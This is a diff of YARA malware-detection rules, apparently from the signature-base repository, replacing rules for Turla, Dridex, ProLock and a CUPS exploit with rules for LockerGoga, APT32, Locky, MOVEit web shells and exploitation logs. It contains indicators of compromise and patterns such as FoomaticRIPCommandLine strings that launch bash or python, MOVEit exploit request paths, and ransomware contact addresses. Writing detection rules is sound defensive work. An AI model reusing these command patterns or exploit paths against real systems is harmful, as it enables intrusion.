-		id = "9f3a35c9-b0f0-5ca6-8b34-19e2d45305f2"
-		date = "2018-02-22"
+		id = "ba5836b9-bc47-54d4-8f7a-475ba0feaac6"
+		date = "2019-03-19"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L92-L103"
+		reference = "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_lockergoga.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b0366194410f36c47dd41f6a36c45edbce75e3ddad19520b17bed59513e1dbc"
+		logic_hash = "076d799113f5bf6c00aa29895cca83ff86e89706cf15ca6971a991d345d0ad65"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
+		hash1 = "c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15"
+		hash2 = "7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26"
+		hash3 = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f"
+
+	strings:
+		$x1 = "\\.(doc|dot|wbk|docx|dotx|docb|xlm|xlsx|xltx|xlsb|xlw|ppt|pot|pps|pptx|potx|ppsx|sldx|pdf)" wide
+		$x2 = "|[A-Za-z]:\\cl.log" wide
+		$x4 = "\\crypto-locker\\" ascii
+		$xc1 = { 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E
+               00 61 00 6D 00 65 00 00 00 00 00 4D 00 6C 00 63
+               00 72 00 6F 00 73 00 6F 00 66 00 74 }
+		$xc2 = { 00 2E 00 6C 00 6F 00 63 00 6B 00 65 00 64 00 00
+               00 20 46 41 49 4C 45 44 20 00 00 00 00 20 00 00
+               00 20 75 6E 6B 6E 6F 77 6E 20 65 78 63 65 70 74
+               69 6F 6E }
+		$rn1 = "This may lead to the impossibility of recovery of the certain files." wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "ac40cf7479f53a4754ac6481a4f24e57"
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) ) or $rn1
 }
-rule SIGNATURE_BASE_Turlamosquito_Mal_6 : FILE
+
+rule SIGNATURE_BASE_EXT_APT32_Goopdate_Installer
 {
 	meta:
-		description = "Detects malware sample from Turla Mosquito report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1c320b60-ec7a-5f87-b871-f55924351f8f"
-		date = "2018-02-22"
+		description = "Detects APT32 installer side-loaded with goopdate.dll"
+		author = "Facebook"
+		id = "08f3cbda-ccb7-517a-b205-5f71de26c735"
+		date = "2021-02-25"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L105-L127"
+		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt32.yar#L3-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ca6ae4313ad8f009b17188aa7184ff01a4b7e35926f3f68dc3aea12bffb9bb1"
+		hash = "69730f2c2bb9668a17f8dfa1f1523e0e1e997ba98f027ce98f5cbaa869347383"
+		logic_hash = "1dcb3009c5c19ff4e54d82d3a4b99b3431e78664f1660522a781e815d96958c4"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
+		tags = ""
 
 	strings:
-		$a1 = "/scripts/m/query.php?id=" fullword wide
-		$a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
-		$a3 = "GetUserNameW fails" fullword wide
-		$s1 = "QVSWQQ" fullword ascii
-		$s2 = "SRRRQP" fullword ascii
-		$s3 = "QSVVQQ" fullword ascii
+		$s0 = { 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? }
+		$s1 = "GetProcAddress"
+		$s2 = { 8B 4D FC ?? ?? 0F B6 51 0C ?? ?? 8B 4D F0 0F B6 1C 01 33 DA }
+		$s3 = "FindNextFileW"
+		$s4 = "Process32NextW"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 2 of ( $a* ) or 4 of them )
+		(pe.is_64bit ( ) or pe.is_32bit ( ) ) and all of them
 }
-
-rule SIGNATURE_BASE_APT_Turlamosquito_MAL_Oct22_1 : FILE
+rule SIGNATURE_BASE_EXT_APT32_Osx_Backdoor_Loader : FILE
 {
 	meta:
-		description = "Detects Turla Mosquito malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f5ad0c0f-81ca-5157-aefb-ead049ada30d"
-		date = "2022-10-25"
+		description = "Detects APT32 backdoor loader on OSX"
+		author = "Facebook"
+		id = "ac313bd8-bf15-5b72-b651-35015f71dd90"
+		date = "2021-02-25"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L129-L156"
+		reference = "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt32.yar#L22-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fbaca774d6398aac7c171a5d87aa456a1921c1b80449d06f392b088db33ee845"
-		score = 80
+		hash = "768510fa9eb807bba9c3dcb3c7f87b771e20fa3d81247539e9ea4349205e39eb"
+		logic_hash = "26964f95a9298b838e06fb9d7f739c8b87a976d8da7fb08416e952d26e84b84e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6b9e48e3f4873cfb95639d9944fe60e3b056daaa2ea914add14c982e3e11128b"
-		hash2 = "b868b674476418bbdffbe0f3d617d1cce4c2b9dae0eaf3414e538376523e8405"
-		hash3 = "e7fd14ca45818044690ca67f201cc8cfb916ccc941a105927fc4c932c72b425d"
 
 	strings:
-		$s1 = "Logger32.dll" ascii fullword
-		$s4 = " executing %u command on drive %martCommand : CWin32ApiErrorExce" wide
-		$s5 = "Unsupported drive!!!" ascii fullword
-		$s7 = "D:\\Build_SVN\\PC_MAGICIAN_4." ascii fullword
-		$op1 = { 40 cc 8b 8b 06 cc 55 00 70 8b 10 10 33 51 04 46 04 64 }
-		$op2 = { c3 10 e8 50 04 00 cc ff 8d 00 69 8d 75 ff 68 ec 6a 4d }
-		$op3 = { e8 64 a1 6e 00 64 a1 c2 04 08 75 40 73 1d 8b ff cc 10 89 cc 8b c3 cc af }
+		$a1 = { 00 D2 44 8A 04 0F 44 88 C0 C0 E8 07 08 D0 88 44 0F FF 48 FF C1 48 83 F9 10 44 88 C2 }
+		$a2 = { 41 0F 10 04 07 0F 57 84 05 A0 FE FF FF 41 0F 11 04 07 48 83 C0 10 48 83 F8 10 75 }
+		$e1 = { CA CF 3E F2 DA 43 E6 D1  D5 6C D4 23 3A AE F1 B2 }
+		$e2 = "MlkHVdRbOkra9s+G65MAoLga340t3+zj/u8LPfP3hig="
+		$e3 = { 5A 69 98 0E 6C 4B 5C 69  7E 19 34 3B C3 07 CA 13 }
+		$e4 = "1Sib4HfPuRQjpxIpECnxxTPiu3FXOFAHMx/+9MEVv9M+h1ngV7T5WUP3b0zsg0Qd"
+		$e5 = "_ArchaeologistCodeine"
+		$e6 = "_PlayerAberadurtheIncomprehensible"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "073235ae6dfbb1bf5db68a039a7b7726" or all of them )
+		(( uint32( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedface ) or ( uint32( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xfeedfacf ) ) and ( 2 of ( $e* ) or all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Dridex_Trojan_XML
+rule SIGNATURE_BASE_Locky_Ransomware
 {
 	meta:
-		description = "Dridex Malware in XML Document"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "a8f3406c-f8b0-559f-be12-6b2a7d401ac2"
-		date = "2015-03-08"
+		description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
+		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
+		id = "ce61e01e-a9ce-54f4-bd2d-8acf1d5fbc30"
+		date = "2016-02-17"
 		modified = "2023-12-05"
-		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dridex_xml.yar#L1-L23"
+		reference = "https://goo.gl/qScSrE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_locky.yar#L8-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "25b6340d782ee20723b2f17f3434a0b27b1561ab22d5a8f859e97e0ac126f651"
+		hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
+		logic_hash = "c7584ea39c4aceedeb0ea2952be6ff212461674175855274f1783eef80ffba86"
 		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
-		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
-		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
-		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
-		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
 
 	strings:
-		$c_xml = "<?xml version="
-		$c_word = "<?mso-application progid=\"Word.Document\"?>"
-		$c_macro = "w:macrosPresent=\"yes\""
-		$c_binary = "<w:binData w:name="
-		$c_0_chars = "<o:Characters>0</o:Characters>"
-		$c_1_line = "<o:Lines>1</o:Lines>"
+		$o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 }
+		$o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 }
 
 	condition:
-		all of ( $c* )
+		all of ( $o* )
 }
 rule SIGNATURE_BASE_Gen_Python_Encoded_Adware : FILE
 {
@@ -328236,23961 +329065,23660 @@ rule SIGNATURE_BASE_Gen_Python_Encoded_Adware : FILE
 	condition:
 		filesize < 100KB and @r1 < 100 and all of them
 }
-rule SIGNATURE_BASE_MAL_Prolock_Malware : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_DLL_Moveit_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects Prolock malware in encrypted and decrypted mode"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "269bf0c5-8315-5405-8e44-e2cc5507a36a"
-		date = "2020-05-17"
+		description = "Detects compiled ASPX web shells found being used in MOVEit Transfer exploitation"
+		author = "Florian Roth"
+		id = "47db8602-9a9e-5efc-b8b9-fbc4f3c8d4e9"
+		date = "2023-06-01"
 		modified = "2023-12-05"
-		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_prolock.yar#L1-L20"
+		reference = "https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/?utm_content=251159938&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da8a0ec683475019daddd4acdd00d4c36eedacad3deef2be4220b86cbf5f9df0"
-		score = 75
+		logic_hash = "47c2ec1e833852941434586b61d6f435b9acb32b2ff48e0a9e8006e0f9ff8056"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0"
-		hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178"
+		hash1 = "6cbf38f5f27e6a3eaf32e2ac73ed02898cbb5961566bb445e3c511906e2da1fa"
 
 	strings:
-		$DecryptionRoutine = {01 C2 31 DB B8 ?? ?? ?? ?? 31 04 1A 81 3C 1A}
-		$DecryptedString1 = "support981723721@protonmail.com" nocase ascii
-		$DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii
-		$DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii
-		$CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E}
+		$x1 = "human2_aspx" ascii fullword
+		$x2 = "X-siLock-Comment" wide
+		$x3 = "x-siLock-Step1" wide
+		$a1 = "MOVEit.DMZ.Core.Data" ascii fullword
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and ( ( $DecryptionRoutine ) or ( 1 of ( $DecryptedString* ) and $CryptoCode ) )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and $a1 ) or all of them
 }
-rule SIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Moveit_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9ecca7d9-3b63-5615-a223-5efa1c53510e"
-		date = "2022-06-10"
+		description = "Detects ASPX web shells as being used in MOVEit Transfer exploitation"
+		author = "Florian Roth"
+		id = "2c789b9c-5ec5-5fd1-84e3-6bf7735a9488"
+		date = "2023-06-01"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_ps_jab.yar#L2-L29"
+		reference = "https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L24-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ad61dca5c945ed87642668e3b834b12c813af244437903a5abb5c69459b9456"
-		score = 70
+		logic_hash = "436f9a503ad938541faa8f34604310ba6d932e40a41dc189ccd293b7191a7621"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		hash1 = "2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5"
+		hash2 = "48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a"
+		hash3 = "e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e"
 
 	strings:
-		$xc1 = { 4a 41 42 ?? 41 43 41 41 50 51 41 67 41 }
-		$xc2 = { 4a 00 41 00 42 00 ?? 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41 }
-		$xc3 = { 4a 41 42 ?? 41 44 30 41 }
-		$xc4 = { 4a 00 41 00 42 00 ?? 00 41 00 44 00 30 00 41 }
+		$s1 = "X-siLock-Comment" ascii fullword
+		$s2 = "]; string x = null;" ascii
+		$s3 = ";  if (!String.Equals(pass, " ascii
 
 	condition:
-		filesize < 30MB and 1 of them
+		filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_Artradownloader2_Aug19_1 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_1
 {
 	meta:
-		description = "Detects ArtraDownloader malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0e688e92-2366-5f36-a32d-083982181eb7"
-		date = "2019-08-27"
+		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
+		author = "Florian Roth"
+		id = "a7c521b8-c654-51dd-9d5b-4ba883feffe3"
+		date = "2023-06-01"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_patchwork.yar#L2-L30"
+		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L43-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c365c3d678c881eeb626b5d26e6164b473990387619337459ccdd8d9f0633b49"
-		score = 75
+		logic_hash = "26674d8dea5cb2e95e442c4c75d80ca610f7373f0b216c0b1c83a5b1f9f70316"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22"
+		tags = ""
 
 	strings:
-		$xc1 = { 47 45 54 20 25 73 20 48 54 54 50 2F 31 2E 30 00
-               0D 0A 00 00 48 6F 73 74 3A 20 25 73 00 00 00 00
-               3F 61 3D 00 26 62 3D 00 26 63 3D 00 26 64 3D 00
-               26 65 3D 00 25 32 30 }
-		$xc2 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
-               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 25 73 20
-               25 64 0D 0A 0D 0A 25 73 00 00 00 00 71 72 79 3D }
-		$xc3 = { 49 44 3D 25 73 00 00 00 3A 00 00 00 25 73 20 25
-               73 20 25 73 0D 0A 25 73 20 25 73 0D 0A 25 73 25
-               73 0D 0A 25 73 25 73 0D 0A 43 6F 6E 74 65 6E 74
-               2D 6C 65 6E 67 74 68 25 73 20 25 64 }
-		$xc4 = { 25 73 20 25 73 20 25 73 0D 0A 25 73 20 25 73 0D
-               0A 25 73 25 73 0D 0A 25 73 25 73 0D 0A 43 6F 6E
-               74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 25 64 0D
-               0A 0D 0A 25 73 }
-		$x1 = "Tpguxbsf]Njdsptpgu" ascii
-		$x2 = ".gpsn.vsmfodpefe" ascii
+		$x1 = "POST /moveitisapi/moveitisapi.dll action=m2 " ascii
+		$x2 = " GET /human2.aspx - 443 " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177 FILE
+rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_2
 {
 	meta:
-		description = "Detects exploit code for CUPS CVE-2024-47177"
+		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
 		author = "Florian Roth"
-		id = "a7b986ad-e943-5350-a6e0-34c40f07874c"
-		date = "2024-09-27"
-		modified = "2024-12-12"
-		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cups_sep24.yar#L2-L15"
+		id = "1527f5e3-071d-5152-9452-9c4472d258f2"
+		date = "2023-06-03"
+		modified = "2023-12-05"
+		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L58-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "633314dea5e3cbdf3cef6e4f18c2efca261dfc600bb9c11d0834fdae102ac9e6"
-		score = 75
+		logic_hash = "56328d078801a702ad47f01f356df6f00be8da593d03c549e77312af9b47b5be"
+		score = 70
 		quality = 85
-		tags = "CVE-2024-47177, FILE"
+		tags = ""
 
 	strings:
-		$s1 = "FoomaticRIPCommandLine: " ascii
-		$s2 = "cupsFilter2 : " ascii
+		$a1 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.102+Safari/537.36" ascii
+		$a2 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36" ascii
+		$s1 = " POST /moveitisapi/moveitisapi.dll" ascii
+		$s2 = " POST /guestaccess.aspx"
+		$s3 = " POST /api/v1/folders/"
+		$s4 = "/files uploadType=resumable&"
+		$s5 = " action=m2 "
 
 	condition:
-		filesize < 400KB and all of them
+		1 of ( $a* ) and 3 of ( $s* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177
+rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_3
 {
 	meta:
-		description = "Detects suspicious FoomaticRIPCommandLine command in printer config, which could be used to exploit CUPS CVE-2024-47177"
-		author = "Florian Roth"
-		id = "cb76f1c7-6dc0-5fed-a970-2a4890db46d3"
-		date = "2024-09-27"
-		modified = "2024-12-12"
-		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cups_sep24.yar#L17-L38"
+		description = "Detects a potential compromise indicator found in MOVEit DMZ Web API logs"
+		author = "Nasreddine Bencherchali"
+		id = "113a501f-d9ed-51fd-82cd-ccb6f02833bd"
+		date = "2023-06-13"
+		modified = "2023-12-05"
+		reference = "https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L81-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2158ca8a08cb7552e2a437de025e3aad63ddc5417245e6ede7283d3bd0fc159b"
-		score = 65
+		logic_hash = "2eaa06c31687c6368f036a705fdc1b1c42355f19c098ae764a998039cc4aebb5"
+		score = 70
 		quality = 85
-		tags = "CVE-2024-47177"
+		tags = ""
 
 	strings:
-		$ = "FoomaticRIPCommandLine: \"bash " ascii
-		$ = "FoomaticRIPCommandLine: \"sh " ascii
-		$ = "FoomaticRIPCommandLine: \"python " ascii
-		$ = "FoomaticRIPCommandLine: \"perl " ascii
-		$ = "FoomaticRIPCommandLine: \"echo " ascii
-		$ = "FoomaticRIPCommandLine: \\\"bash " ascii
-		$ = "FoomaticRIPCommandLine: \\\"sh " ascii
-		$ = "FoomaticRIPCommandLine: \\\"python " ascii
-		$ = "FoomaticRIPCommandLine: \\\"perl " ascii
-		$ = "FoomaticRIPCommandLine: \\\"echo " ascii
+		$s1 = "TargetInvocationException" ascii
+		$s2 = "MOVEit.DMZ.Application.Folders.ResumableUploadFilePartHandler.DeserializeFileUploadStream" ascii
 
 	condition:
-		1 of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_Hawkeye_Keylogger_Feb18_1 : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2021_1647_Apr21_1 : CVE_2021_1647 FILE
 {
 	meta:
-		description = "Semiautomatically generated YARA rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6b4b447f-43d6-5774-a1b9-d53b40364732"
-		date = "2018-02-12"
-		modified = "2023-01-06"
-		reference = "https://app.any.run/tasks/ae2521dd-61aa-4bc7-b0d8-8c85ddcbfcc9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hawkeye.yar#L2-L18"
+		description = "Detects samples that exploit CVE-2021-1647"
+		author = "Arkbird_SOLG"
+		id = "ecce018e-1bee-5374-b6c8-984c2a8c2530"
+		date = "2021-05-04"
+		modified = "2023-12-05"
+		reference = "https://attackerkb.com/topics/DzXZpEuBeP/cve-2021-1647-microsoft-windows-defender-zero-day-vulnerability"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_1647.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39037ccb90b747c098fbf5a504aee4a6a716901ff5841ae328ea40d06cc3fcfd"
-		score = 90
+		logic_hash = "b0e1809ba10e5ea624e1c4d2e948c928c590b40e6315def8cb1216930ead8579"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "bb58922ad8d4a638e9d26076183de27fb39ace68aa7f73adc0da513ab66dc6fa"
+		tags = "CVE-2021-1647, FILE"
+		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
+		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
+		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
+		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
 
 	strings:
-		$s1 = "UploadReportLogin.asmx" fullword wide
-		$s2 = "tmp.exe" fullword wide
-		$s3 = "%appdata%\\" wide
+		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
